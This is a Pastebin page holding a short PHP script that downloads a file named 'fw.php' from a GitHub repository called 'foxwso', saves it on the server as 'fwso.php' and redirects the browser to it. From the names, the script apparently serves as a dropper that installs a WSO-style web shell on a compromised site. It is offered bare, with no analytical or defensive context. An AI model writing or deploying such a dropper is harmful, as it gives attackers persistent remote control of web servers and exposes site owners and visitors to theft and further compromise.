Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- //WillyGoID, 13 Mei 2022
- $content = "https://raw.githubusercontent.com/willygoid/foxwso/main/fw.php";
- $get_content = file_get_contents($content);
- if(file_exists("fwso.php")){header("location: fwso.php");}else{file_put_contents("fwso.php", $get_content); header("location: fwso.php");}
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement